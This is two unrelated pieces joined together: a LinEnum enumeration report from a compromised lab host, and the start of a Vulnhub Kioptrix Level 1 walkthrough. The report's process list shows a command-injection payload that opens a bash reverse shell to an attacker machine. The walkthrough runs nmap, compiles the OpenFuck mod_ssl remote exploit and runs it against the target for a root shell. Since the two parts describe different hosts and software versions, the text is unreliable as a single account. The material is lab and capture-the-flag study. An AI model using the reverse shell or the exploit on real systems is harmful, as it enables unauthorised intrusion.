-rwxr-xr-x   1 root root   414 Sep 14  2006 00-makewhatis.cron
-rwxr-xr-x   1 root root   277 Feb 21  2005 0anacron
-rwxr-xr-x   1 root root    90 May  5  2007 yum.cron


[00;31m[-] Crontab contents:[00m
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
HOME=/

# run-parts
01 * * * * root run-parts /etc/cron.hourly
02 4 * * * root run-parts /etc/cron.daily
22 4 * * 0 root run-parts /etc/cron.weekly
42 4 1 * * root run-parts /etc/cron.monthly


[00;31m[-] Anacron jobs and associated file permissions:[00m
-rw-r--r--  1 root root 329 Feb 21  2005 /etc/anacrontab
# /etc/anacrontab: configuration file for anacron

# See anacron(8) and anacrontab(5) for details.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root

1	65	cron.daily		run-parts /etc/cron.daily
7	70	cron.weekly		run-parts /etc/cron.weekly
30	75	cron.monthly		run-parts /etc/cron.monthly


[00;31m[-] When were jobs last executed (/var/spool/anacron contents):[00m
total 28
drwxr-xr-x   2 root root 4096 Oct  7  2009 .
drwxr-xr-x  14 root root 4096 Oct  7  2009 ..
-rw-------   1 root root    9 Oct 12  2009 cron.daily
-rw-------   1 root root    9 Oct  7  2009 cron.monthly
-rw-------   1 root root    9 Oct 11  2009 cron.weekly


[00;33m### NETWORKING  ##########################################[00m
[00;31m[-] Network and IP info:[00m
eth0      Link encap:Ethernet  HWaddr 00:0C:29:13:53:6F  
          inet addr:192.168.1.10  Bcast:192.168.1.255  Mask:255.255.255.0
          inet6 addr: fe80::20c:29ff:fe13:536f/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:483 errors:0 dropped:0 overruns:0 frame:0
          TX packets:266 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:94501 (92.2 KiB)  TX bytes:35907 (35.0 KiB)
          Interrupt:177 Base address:0x2000 

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:173 errors:0 dropped:0 overruns:0 frame:0
          TX packets:173 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:12722 (12.4 KiB)  TX bytes:12722 (12.4 KiB)

sit0      Link encap:IPv6-in-IPv4  
          NOARP  MTU:1480  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:0 (0.0 b)  TX bytes:0 (0.0 b)


[00;31m[-] ARP history:[00m
kali.domain.name (192.168.1.9) at 00:00:00:00:00:00 [ether] on eth0
RTK_GW.domain.name (192.168.1.1) at 00:00:00:00:00:00  [ether] on eth0


[00;31m[-] Nameserver(s):[00m
nameserver 192.168.1.1
nameserver 1.1.1.1
nameserver 8.8.8.8


[00;31m[-] Default route:[00m
default         RTK_GW.domain.n 0.0.0.0         UG    0      0        0 eth0


[00;31m[-] Listening TCP:[00m
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address               Foreign Address             State       PID/Program name   
tcp        0      0 0.0.0.0:646                 0.0.0.0:*                   LISTEN      -                   
tcp        0      0 0.0.0.0:3306                0.0.0.0:*                   LISTEN      -                   
tcp        0      0 0.0.0.0:111                 0.0.0.0:*                   LISTEN      -                   
tcp        0      0 0.0.0.0:631                 0.0.0.0:*                   LISTEN      -                   
tcp        0      0 127.0.0.1:25                0.0.0.0:*                   LISTEN      -                   
tcp        0      0 :::80                       :::*                        LISTEN      3835/sh             
tcp        0      0 :::22                       :::*                        LISTEN      -                   
tcp        0      0 :::443                      :::*                        LISTEN      3835/sh             


[00;31m[-] Listening UDP:[00m
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address               Foreign Address             State       PID/Program name   
udp        0      0 0.0.0.0:640                 0.0.0.0:*                               -                   
udp        0      0 0.0.0.0:643                 0.0.0.0:*                               -                   
udp        0      0 0.0.0.0:68                  0.0.0.0:*                               -                   
udp        0      0 0.0.0.0:111                 0.0.0.0:*                               -                   
udp        0      0 0.0.0.0:631                 0.0.0.0:*                               -                   


[00;33m### SERVICES #############################################[00m
[00;31m[-] Running processes:[00m
USER       PID %CPU %MEM   VSZ  RSS TTY      STAT START   TIME COMMAND
root         1  0.2  0.4  1976  544 ?        S    23:23   0:02 init [3]                                   
root         2  0.0  0.0     0    0 ?        SN   23:23   0:00 [ksoftirqd/0]
root         3  0.0  0.0     0    0 ?        S<   23:23   0:00 [events/0]
root         4  0.0  0.0     0    0 ?        S<   23:23   0:00 [khelper]
root         5  0.0  0.0     0    0 ?        S<   23:23   0:00 [kacpid]
root        82  0.0  0.0     0    0 ?        S<   23:23   0:00 [kblockd/0]
root        83  0.0  0.0     0    0 ?        S    23:23   0:00 [khubd]
root       100  0.0  0.0     0    0 ?        S    23:23   0:00 [pdflush]
root       101  0.0  0.0     0    0 ?        S    23:23   0:00 [pdflush]
root       102  0.0  0.0     0    0 ?        S    23:23   0:00 [kswapd0]
root       103  0.0  0.0     0    0 ?        S<   23:23   0:00 [aio/0]
root       249  0.0  0.0     0    0 ?        S    23:23   0:00 [kseriod]
root       482  0.0  0.0     0    0 ?        S<   23:23   0:00 [ata/0]
root       483  0.0  0.0     0    0 ?        S<   23:23   0:00 [ata_aux]
root       498  0.0  0.0     0    0 ?        S    23:23   0:00 [kjournald]
root      1745  0.0  0.3  3272  440 ?        S<s  23:23   0:00 udevd
root      1777  0.0  0.0     0    0 ?        S    23:23   0:00 [shpchpd_event]
root      1862  0.0  0.0     0    0 ?        S<   23:23   0:00 [kauditd]
root      1974  0.0  0.0     0    0 ?        S    23:24   0:00 [kjournald]
root      2534  0.0  0.4  1564  540 ?        Ss   23:24   0:00 syslogd -m 0
root      2538  0.0  0.3  2340  384 ?        Ss   23:24   0:00 klogd -x
rpc       2565  0.0  0.4  2400  540 ?        Ss   23:24   0:00 portmap
rpcuser   2584  0.0  0.6  2984  820 ?        Ss   23:24   0:00 rpc.statd
root      2610  0.0  0.2  5844  372 ?        Ss   23:24   0:00 rpc.idmapd
root      2682  0.0  0.3  3472  444 ?        Ss   23:24   0:00 /usr/sbin/acpid
root      2691  0.0  1.7  8320 2208 ?        Ss   23:24   0:00 cupsd
root      2743  0.0  0.8  5808 1124 ?        Ss   23:24   0:00 /usr/sbin/sshd
root      2779  0.0  0.6  3196  768 ?        Ss   23:24   0:00 xinetd -stayalive -pidfile /var/run/xinetd.pid
root      2797  0.0  1.4  8348 1860 ?        Ss   23:24   0:00 sendmail: accepting connections
smmsp     2806  0.0  1.2  7200 1628 ?        Ss   23:24   0:00 sendmail: Queue runner@01:00:00 for /var/spool/clientmqueue
root      2816  0.0  0.2  2316  348 ?        Ss   23:24   0:00 gpm -m /dev/input/mice -t imps2
root      2825  0.0  0.7  4724  936 ?        Ss   23:24   0:00 crond
xfs       2847  0.0  1.0  3992 1300 ?        Ss   23:24   0:00 xfs -droppriv -daemon
root      2856  0.0  0.4  2280  504 ?        SNs  23:24   0:00 anacron -s
root      2864  0.0  0.3  3108  424 ?        Ss   23:24   0:00 /usr/sbin/atd
dbus      2873  0.0  0.6  3432  804 ?        Ss   23:24   0:00 dbus-daemon-1 --system
root      2882  0.0  4.5  8280 5764 ?        Ss   23:24   0:00 hald
root      3137  0.0  0.4  3256  596 ?        Ss   23:24   0:00 dhclient
root      3139  0.0  7.0 20416 8860 ?        Ss   23:24   0:00 httpd
root      3165  0.0  0.9  5852 1236 ?        S    23:24   0:00 /bin/sh /usr/bin/mysqld_safe --datadir=/var/lib/mysql --socket=/var/lib/mysql/mysql.sock --err-log=/var/log/mysqld.log --pid-file=/var/run/mysqld/mysqld.pid
mysql     3207  0.0 14.6 125668 18424 ?      Sl   23:24   0:00 /usr/libexec/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid-file=/var/run/mysqld/mysqld.pid --skip-external-locking --socket=/var/lib/mysql/mysql.sock
apache    3212  0.0  4.5 20548 5776 ?        S    23:24   0:00 httpd
apache    3213  0.0  3.9 20416 4920 ?        S    23:24   0:00 httpd
apache    3214  0.0  4.5 20560 5776 ?        S    23:24   0:00 httpd
apache    3215  0.0  4.2 20416 5388 ?        S    23:24   0:00 httpd
apache    3216  0.0  4.2 20416 5388 ?        S    23:24   0:00 httpd
apache    3217  0.0  3.4 20416 4296 ?        S    23:24   0:00 httpd
apache    3218  0.0  4.2 20416 5376 ?        S    23:24   0:00 httpd
apache    3219  0.0  4.2 20420 5324 ?        S    23:24   0:00 httpd
root      3237  0.0  0.3  3304  384 tty1     Ss+  23:24   0:00 /sbin/mingetty tty1
root      3238  0.0  0.3  2500  388 tty2     Ss+  23:24   0:00 /sbin/mingetty tty2
root      3239  0.0  0.3  3164  388 tty3     Ss+  23:24   0:00 /sbin/mingetty tty3
root      3240  0.0  0.3  1932  388 tty4     Ss+  23:24   0:00 /sbin/mingetty tty4
root      3241  0.0  0.3  2772  388 tty5     Ss+  23:24   0:00 /sbin/mingetty tty5
root      3242  0.0  0.3  2776  384 tty6     Ss+  23:24   0:00 /sbin/mingetty tty6
apache    3835  0.0  0.8  4912 1124 ?        S    23:33   0:00 sh -c ping -c 3 127.0.0.1; bash -i >& /dev/tcp/192.168.1.9/9001 0>&1
apache    3837  0.0  1.0  4684 1332 ?        S    23:33   0:00 bash -i
apache    3845  0.0  1.1  4912 1420 ?        S    23:36   0:00 bash ./LinEnum.sh
apache    3846  0.0  0.6  4944  864 ?        R    23:36   0:00 bash ./LinEnum.sh
apache    3848  0.0  0.3  5480  452 ?        S    23:36   0:00 tee -a
apache    3849  0.3  0.3  4376  452 ?        S    23:36   0:00 tee report.txt
apache    4046  0.0  0.6  4944  808 ?        S    23:36   0:00 bash ./LinEnum.sh
apache    4047  0.0  0.6  4152  792 ?        R    23:36   0:00 ps aux


[00;31m[-] Process binaries and associated permissions (from above list):[00m
lrwxrwxrwx  1 root root       4 Oct  7  2009 /bin/sh -> bash
-rwxr-xr-x  1 root root   12772 Feb 21  2005 /sbin/mingetty
-rwxr-xr-x  1 root root 6036288 Jul 25  2008 /usr/libexec/mysqld
-rwxr-x---  1 root root   22540 Feb 21  2005 /usr/sbin/acpid
-rwxr-xr-x  1 root root   19544 Apr 26  2006 /usr/sbin/atd
-rwxr-xr-x  1 root root  313008 May  2  2007 /usr/sbin/sshd


[00;31m[-] Contents of /etc/xinetd.conf:[00m
#
# Simple configuration file for xinetd
#
# Some defaults, and include /etc/xinetd.d/

defaults
{
	instances               = 60
        log_type                = SYSLOG authpriv
        log_on_success		= HOST PID
        log_on_failure		= HOST
	cps			= 25 30
}

includedir /etc/xinetd.d


[00;31m[-] /etc/xinetd.d is included in /etc/xinetd.conf - associated binary permissions are listed below:[00m
total 144
drwxr-xr-x   2 root root  4096 Oct  7  2009 .
drwxr-xr-x  80 root root 12288 Dec 18 23:24 ..
-rw-r--r--   1 root root   563 Aug 21  2005 chargen
-rw-r--r--   1 root root   580 Aug 21  2005 chargen-udp
-rwxr-xr-x   1 root root   239 May  3  2007 cups-lpd
-rw-r--r--   1 root root   419 Aug 21  2005 daytime
-rw-r--r--   1 root root   438 Aug 21  2005 daytime-udp
-rw-r--r--   1 root root   341 Aug 21  2005 echo
-rw-r--r--   1 root root   360 Aug 21  2005 echo-udp
-rw-r--r--   1 root root   323 May  3  2007 eklogin
-rw-r--r--   1 root root   326 May  3  2007 gssftp
-rw-r--r--   1 root root   310 May  3  2007 klogin
-rw-r--r--   1 root root   323 May  3  2007 krb5-telnet
-rw-r--r--   1 root root   308 May  3  2007 kshell
-rw-r--r--   1 root root   317 Feb 21  2005 rsync
-rw-r--r--   1 root root   497 Aug 21  2005 time
-rw-r--r--   1 root root   518 Aug 21  2005 time-udp


[00;31m[-] /etc/init.d/ binary permissions:[00m
lrwxrwxrwx  1 root root 11 Oct  7  2009 /etc/init.d -> rc.d/init.d


[00;31m[-] /etc/rc.d/init.d binary permissions:[00m
total 712
drwxr-xr-x   2 root root     4096 Oct  8  2009 .
drwxr-xr-x  10 root root     4096 Oct  7  2009 ..
-rwxr-xr-x   1 root root     1128 Feb 21  2005 acpid
-rwxr-xr-x   1 root root      834 Feb 21  2005 anacron
-rwxr-xr-x   1 root root     1429 Feb 21  2005 apmd
-rwxr-xr-x   1 root root     4404 Feb 21  2005 arptables_jf
-rwxr-xr-x   1 root root     1176 Apr 26  2006 atd
-rwxr-xr-x   1 root root     2781 May  2  2007 auditd
-rwxr-xr-x   1 root root    16544 May  3  2007 autofs
-rwxr-xr-x   1 root root     1368 Feb 21  2005 bluetooth
-rwxr-xr-x   1 root root     1355 May  2  2007 cpuspeed
-rwxr-xr-x   1 root root     1904 Jul 12  2006 crond
-rwxr-xr-x   1 root root     2312 May  3  2007 cups
-rwxr-xr-x   1 root root     1502 Feb 21  2005 dc_client
-rwxr-xr-x   1 root root     1344 Feb 21  2005 dc_server
-rwxr-xr-x   1 root root    16898 May  2  2007 diskdump
-rwxr-xr-x   1 root root      968 Feb 21  2005 dund
-rwxr-xr-x   1 root root    10799 Nov 20  2006 functions
-rwxr-xr-x   1 root root     1778 May 17  2006 gpm
-rwxr-xr-x   1 root root     1388 May  2  2007 haldaemon
-rwxr-xr-x   1 root root     6028 Jan 15  2007 halt
-rwxr-xr-x   1 root root     1001 Feb 21  2005 hidd
-rwxr-xr-x   1 root root     3201 May  4  2007 httpd
-rwxr-xr-x   1 root root    13763 May  3  2007 ipmi
-rwxr-xr-x   1 root root     7135 Feb 21  2005 iptables
-rwxr-xr-x   1 root root     1487 Feb 21  2005 irda
-rwxr-xr-x   1 root root     1949 May  2  2007 irqbalance
-rwxr-xr-x   1 root root     6183 Feb 21  2005 isdn
-rwxr-xr-x   1 root root      200 Sep 27  2006 keytable
-rwxr-xr-x   1 root root      652 Sep  3  2003 killall
-rwxr-xr-x   1 root root     2095 May  2  2007 kudzu
-rwxr-xr-x   1 root root     1906 May  5  2007 lvm2-monitor
-rwxr-xr-x   1 root root     1700 May  3  2007 mdmonitor
-rwxr-xr-x   1 root root     1613 May  3  2007 mdmpd
-rwxr-xr-x   1 root root     1746 May  3  2007 messagebus
-rwxr-xr-x   1 root root     1731 May  2  2007 microcode_ctl
-rwxr-xr-x   1 root root     4235 Jul 25  2008 mysqld
-rwxr-xr-x   1 root root    12198 May  2  2007 netdump
-rwxr-xr-x   1 root root     7422 Nov 20  2006 netfs
-rwxr-xr-x   1 root root     1303 May  2  2007 netplugd
-rwxr-xr-x   1 root root     8543 Apr 18  2006 network
-rwxr-xr-x   1 root root     1454 May  3  2007 NetworkManager
-rwxr-xr-x   1 root root     4344 May  3  2007 nfs
-rwxr-xr-x   1 root root     3274 May  3  2007 nfslock
-rwxr-xr-x   1 root root     2171 May  2  2007 nscd
-rwxr-xr-x   1 root root     3586 May  5  2007 ntpd
-rwxr-xr-x   1 root root    17713 May  3  2007 openibd
-rwxr-xr-x   1 root root     1144 Feb 21  2005 pand
-rwxr-xr-x   1 root root     4431 Mar  8  2006 pcmcia
-rwxr-xr-x   1 root root     1877 Feb 21  2005 portmap
-rwxr-xr-x   1 root root     1021 Jan 17  2007 psacct
-rwxr-xr-x   1 root root     2404 Oct 18  2004 rawdevices
-rwxr-xr-x   1 root root     1387 May  2  2007 rdisc
-rwxr-xr-x   1 root root      790 May  2  2007 readahead
-rwxr-xr-x   1 root root      795 May  2  2007 readahead_early
-rwxr-xr-x   1 root root     1777 May  3  2007 rhnsd
-rwxr-xr-x   1 root root     2177 May  3  2007 rpcgssd
-rwxr-xr-x   1 root root     1805 May  3  2007 rpcidmapd
-rwxr-xr-x   1 root root     2153 May  3  2007 rpcsvcgssd
-rwxr-xr-x   1 root root     1547 Feb 21  2005 saslauthd
-rwxr-xr-x   1 root root     3349 May  2  2007 sendmail
-rwxr-xr-x   1 root root     1175 Jul 10  2002 single
-rwxr-xr-x   1 root root     2247 May  2  2007 smartd
-rwxr-xr-x   1 root root     3282 May  4  2007 squid
-rwxr-xr-x   1 root root     3105 May  2  2007 sshd
-rwxr-xr-x   1 root root     1369 Feb 21  2005 syslog
-rwxr-x---   1 root pegasus  2321 Aug 12  2006 tog-pegasus
-rwxr-xr-x   1 root root     2796 Feb 21  2005 tux
-rwxr-xr-x   1 root root     1880 Aug 12  2006 vsftpd
-rwxr-xr-x   1 root root     1548 Feb 15  2007 winbind
-rwxr-xr-x   1 root root     1650 May  2  2007 wpa_supplicant
-rwxr-xr-x   1 root root     3607 May  3  2007 xfs
-rwxr-xr-x   1 root root     2497 Aug 21  2005 xinetd
-rwxr-xr-x   1 root root     2822 May  2  2007 ypbind
-rwxr-xr-x   1 root root     1036 May  5  2007 yum


[00;33m### SOFTWARE #############################################[00m
[00;31m[-] Sudo version:[00m
Sudo version 1.6.7p5


[00;31m[-] MYSQL version:[00m
mysql  Ver 14.7 Distrib 4.1.22, for redhat-linux-gnu (i686) using readline 4.3


[00;31m[-] Apache version:[00m
Server version: Apache/2.0.52
Server built:   May  4 2007 06:25:03


[00;33m### INTERESTING FILES ####################################[00m
[00;31m[-] Useful file locations:[00m
/usr/bin/wget
/usr/bin/nmap
/usr/bin/gcc
/usr/bin/curl


[00;31m[-] Can we read/write sensitive files:[00m
-rw-r--r--  1 root root 1772 Oct 12  2009 /etc/passwd
-rw-r--r--  1 root root 638 Oct 12  2009 /etc/group
-rw-r--r--  1 root root 842 May 24  2004 /etc/profile
-r--------  1 root root 1141 Oct 12  2009 /etc/shadow


[00;31m[-] SUID files:[00m
-r-sr-xr-x  1 root root 46076 May  2  2007 /sbin/unix_chkpwd
-r-s--x--x  1 root root 20016 May  2  2007 /sbin/pam_timestamp_check
-r-sr-xr-x  1 root root 301242 May  2  2007 /sbin/pwdb_chkpwd
-rwsr-xr-x  1 root root 6096 May  2  2007 /usr/sbin/ccreds_validate
-rws--x--x  1 root root 30760 May  2  2007 /usr/sbin/userhelper
-rwsr-xr-x  1 root root 6668 Feb 21  2005 /usr/sbin/userisdnctl
-r-s--x---  1 root apache 10760 May  4  2007 /usr/sbin/suexec
-rwsr-xr-x  1 root root 15228 May  3  2007 /usr/sbin/usernetctl
-rws--x--x  1 root root 434644 May  2  2007 /usr/libexec/openssh/ssh-keysign
-rwsr-xr-x  1 root root 7396 May  2  2007 /usr/libexec/pt_chown
-rwsr-xr-x  1 root root 123961 May  3  2007 /usr/kerberos/bin/ksu
-rwsr-x---  1 root squid 9952 May  4  2007 /usr/lib/squid/pam_auth
-rwsr-x---  1 root squid 10208 May  4  2007 /usr/lib/squid/ncsa_auth
-rws--x--x  1 root root 18392 May  3  2007 /usr/bin/chsh
-rwsr-xr-x  1 root root 17304 May 10  2006 /usr/bin/rcp
---s--x--x  1 root root 93816 Aug 21  2005 /usr/bin/sudo
-rwsr-xr-x  1 root root 117802 May  2  2007 /usr/bin/chage
-rwsr-xr-x  1 root root 82772 Jul 12  2006 /usr/bin/crontab
-rwsr-xr-x  1 root root 12312 May 10  2006 /usr/bin/rlogin
-rwsr-xr-x  1 root root 8692 May 10  2006 /usr/bin/rsh
-rwsr-xr-x  1 root root 131181 May  2  2007 /usr/bin/gpasswd
-rwsr-xr-x  1 root root 42280 Apr 26  2006 /usr/bin/at
-rws--x--x  1 root root 7700 May  3  2007 /usr/bin/newgrp
-rws--x--x  1 root root 17708 May  3  2007 /usr/bin/chfn
-rwsr-xr-x  1 root root 19597 May  3  2007 /usr/bin/lppasswd
-rwsr-xr-x  1 root root 72261 May  2  2007 /usr/bin/sg
-r-s--x--x  1 root root 21200 Aug 21  2005 /usr/bin/passwd
-rwsr-xr-x  1 root root 87016 May  3  2007 /bin/mount
-rwsr-xr-x  1 root root 12300 May  2  2007 /bin/traceroute6
-rwsr-xr-x  1 root root 23844 Nov 23  2006 /bin/traceroute
-rwsr-xr-x  1 root root 53612 May  3  2007 /bin/umount
-rwsr-xr-x  1 root root 30924 May  2  2007 /bin/ping6
-rwsr-xr-x  1 root root 33272 May  2  2007 /bin/ping
-rwsr-xr-x  1 root root 61168 May  5  2007 /bin/su


[00;31m[-] SGID files:[00m
-rwxr-Sr-t  1 root root 1733 Feb  9  2012 /var/www/html/index.php
-rwxr-Sr-t  1 root root 199 Oct  8  2009 /var/www/html/pingit.php
-rwxr-sr-x  1 root root 11367 May  3  2007 /sbin/netreport
-rwxr-sr-x  1 root lock 15372 Apr  4  2006 /usr/sbin/lockdev
-rwxr-sr-x  1 root smmsp 746328 May  2  2007 /usr/sbin/sendmail.sendmail
-rwxr-sr-x  1 root utmp 10497 Feb 21  2005 /usr/sbin/utempter
-r-xr-sr-x  1 root tty 9752 May  5  2007 /usr/bin/wall
-rwxr-sr-x  1 root slocate 38548 Aug 21  2005 /usr/bin/slocate
-rwxr-sr-x  1 root mail 14636 Feb 21  2005 /usr/bin/lockfile
-rwxr-sr-x  1 root tty 10124 May  3  2007 /usr/bin/write
-rwxr-sr-x  1 root nobody 57932 May  2  2007 /usr/bin/ssh-agent


[00;33m[+] Possibly interesting SGID files:[00m
-rwxr-Sr-t  1 root root 1733 Feb  9  2012 /var/www/html/index.php
-rwxr-Sr-t  1 root root 199 Oct  8  2009 /var/www/html/pingit.php


[00;31m[-] NFS config details: [00m
-rw-r--r--  1 root root 0 Jan 12  2000 /etc/exports


[-] Can't search *.conf files as no keyword was entered

[-] Can't search *.php files as no keyword was entered

[-] Can't search *.log files as no keyword was entered

[-] Can't search *.ini files as no keyword was entered

[00;31m[-] All *.conf files in /etc (recursive 1 level):[00m
-rw-r--r--  1 root root 694 Feb 21  2005 /etc/syslog.conf
-rw-r--r--  1 root root 401 May  5  2007 /etc/yum.conf
-rwxr-xr-x  1 root root 1484 Jan  1  2006 /etc/request-key.conf
-rw-r--r--  1 root root 10 Oct  7  2009 /etc/pam_smb.conf
-rw-r--r--  1 root root 1623 Oct  7  2009 /etc/nsswitch.conf
-rw-r--r--  1 root root 658 May  3  2007 /etc/initlog.conf
-rw-r--r--  1 root root 216 May  3  2007 /etc/sestatus.conf
-rw-r--r--  1 root root 28 May  2  2007 /etc/ld.so.conf
-rw-r--r--  1 root root 3243 Feb 21  2005 /etc/lftp.conf
-rw-r--r--  1 root root 10814 Feb 20  2006 /etc/ltrace.conf
-rw-r--r--  1 root root 23735 Feb 21  2005 /etc/webalizer.conf
-rw-r--r--  1 root root 604 May  3  2007 /etc/sysctl.conf
-rw-r--r--  1 root root 585 Oct  7  2009 /etc/yp.conf
-rw-r--r--  1 root root 1895 May  2  2007 /etc/nscd.conf
-rw-r--r--  1 root root 3058 Oct  7  2009 /etc/smartd.conf
-rw-r-----  1 root root 450 May  2  2007 /etc/auditd.conf
-rw-r--r--  1 root root 117 Dec 18 23:24 /etc/resolv.conf
-rw-r--r--  1 root root 23488 Feb 21  2005 /etc/jwhois.conf
-rw-r--r--  1 root root 134 May  2  2007 /etc/pwdb.conf
-rw-r--r--  1 root root 2281 Oct  7  2009 /etc/krb.conf
-rw-r--r--  1 root root 296 Aug 21  2005 /etc/updatedb.conf
-rw-r--r--  1 root root 833 Aug 13  2006 /etc/gssapi_mech.conf
-rw-r--r--  1 root root 505 Oct 20  2006 /etc/logrotate.conf
-rw-r--r--  1 root root 17 Jul 23  2000 /etc/host.conf
-rw-r--r--  1 root root 2657 May  2  2007 /etc/warnquota.conf
-rw-r--r--  1 root root 615 Oct  7  2009 /etc/krb5.conf
-rw-r--r--  1 root root 759 Jun  1  2009 /etc/pear.conf
-rw-r--r--  1 root root 153 Feb 21  2005 /etc/esd.conf
-rw-r--r--  1 root root 1983 Feb 21  2005 /etc/mtools.conf
-rw-r--r--  1 root root 463 May  2  2007 /etc/cpuspeed.conf
-rw-r--r--  1 root root 2374 Oct  7  2009 /etc/libuser.conf
-rw-r--r--  1 root root 2434 May  5  2007 /etc/ntp.conf
-rw-r--r--  1 root root 821 Oct  1  2004 /etc/prelink.conf
-rw-r--r--  1 root root 1756 May 17  2006 /etc/gpm-root.conf
-rw-r--r--  1 root root 177 May  3  2007 /etc/idmapd.conf
-rw-r--r--  1 root root 0 Feb 21  2005 /etc/wvdial.conf
-rw-r--r--  1 root root 8738 Oct  7  2009 /etc/ldap.conf
-rw-r--r--  1 root root 51 Oct 12  2009 /etc/modprobe.conf
-rw-r--r--  1 root root 289 Aug 21  2005 /etc/xinetd.conf


[00;31m[-] Location and Permissions (if accessible) of .bak file(s):[00m
-r--r--r--  1 root root 1243 Aug 16  2003 /usr/lib/perl5/vendor_perl/5.8.5/i386-linux-thread-multi/Filter/exec.pm.bak
-r--r--r--  1 root root 1471 Aug 16  2003 /usr/lib/perl5/vendor_perl/5.8.5/i386-linux-thread-multi/Filter/sh.pm.bak
-r--r--r--  1 root root 2181 Aug 16  2003 /usr/lib/perl5/vendor_perl/5.8.5/i386-linux-thread-multi/Filter/cpp.pm.bak
-rw-r--r--  1 root root 47 Oct 10  2009 /etc/issue.bak


[00;31m[-] Any interesting mail in /var/mail:[00m
lrwxrwxrwx  1 root root 10 Oct  7  2009 /var/mail -> spool/mail


[00;33m### SCAN COMPLETE ####################################[00m

OSCP like Vulnhub machines: Kioptrix: Level 1 (#1)

Kudos to abatchy’s blog for compiling this list.

Download VM

Let’s start the enumeration with nmap.

nmap -sCV -v -oA tcp 192.168.1.8

And we got the following output.

# Nmap 7.80 scan initiated Sat Dec 12 01:55:02 2020 as: nmap -sCV -v -oN tcp 192.168.1.8
Nmap scan report for 192.168.1.8
Host is up (0.0032s latency).
Not shown: 994 closed ports
PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 2.9p2 (protocol 1.99)
| ssh-hostkey: 
|   1024 b8:74:6c:db:fd:8b:e6:66:e9:2a:2b:df:5e:6f:64:86 (RSA1)
|   1024 8f:8e:5b:81:ed:21:ab:c1:80:e1:57:a3:3c:85:c4:71 (DSA)
|_  1024 ed:4e:a9:4a:06:14:ff:15:14:ce:da:3a:80:db:e2:81 (RSA)
|_sshv1: Server supports SSHv1
80/tcp    open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods: 
|   Supported Methods: GET HEAD OPTIONS TRACE
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
111/tcp   open  rpcbind     2 (RPC #100000)
139/tcp   open  netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp   open  ssl/https   Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
| http-methods: 
|_  Supported Methods: GET HEAD POST
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: 400 Bad Request
|_ssl-date: 2020-12-12T07:57:57+00:00; +1h01m49s from scanner time.
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_RC4_64_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|_    SSL2_DES_64_CBC_WITH_MD5
32768/tcp open  status      1 (RPC #100024)
MAC Address: 00:00:00:00:00:00(VMware)

Host script results:
|_clock-skew: 1h01m48s
| nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
|   KIOPTRIX<00>         Flags: <unique><active>
|   KIOPTRIX<03>         Flags: <unique><active>
|   KIOPTRIX<20>         Flags: <unique><active>
|   MYGROUP<00>          Flags: <group><active>
|_  MYGROUP<1e>          Flags: <group><active>
|_smb2-time: Protocol negotiation failed (SMB2)

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Dec 12 01:57:08 2020 -- 1 IP address (1 host up) scanned in 126.36 seconds

Now, there are at least two ways to root this machine.

Method #1

I have found port 80 and port 443 open. But upon closer inspection and some directory bruteforcing with gobuster, i felt that it is a rabbit hole. However, notice the banner of the webserver. It says the server version as Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b

On searchsploit-ing the mod_ssl version, we got a potential match.

With some trial and error, I’ve found a working exploit; which is Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (2).

The exploit was compiled with the following command as instructed in the exploit code.

gcc -o OpenFuck 47080.c -lcrypto

Upon compiling the exploit, I’ve found out that the exploit requires the exact version number of Apache. The exploit requires the a hexadecimal number corresponding to our linux distribution and apache version.

I have found the linux version as Redhat and the Apache version as 1.3.20.

From the above list, the hex number I needed is 0x6b. The syntax to execute the exploit is as follows, where 443 is the port number and -c 40 is used to mention the number of connections required (Didn’t think it was required at least in our case).

./OpenFuck 0x6b 192.168.1.8 443 -c 40

And we have the root shell!

Method #2

Now the next exploitation method is a little bit tricky. The vulnerability is in the samba package, but the SMB version is (kind of) hidden and we have to manually enumerate the SMB version.

Usually, to enumerate SMB version manually, we can rely on smb version enumeration scripts like this or this. If they aren’t working as they should be, then we can always use wireshark to manually enumerate the version by using display filters like,

smb and ip.src=={IP}

and look at the TCP stream.

As we can see, there is no version information in the SMB response.

So, let’s manually enumerate the SMB version using a google dork.

apache 1.3.20 site:rpm.pbone.net

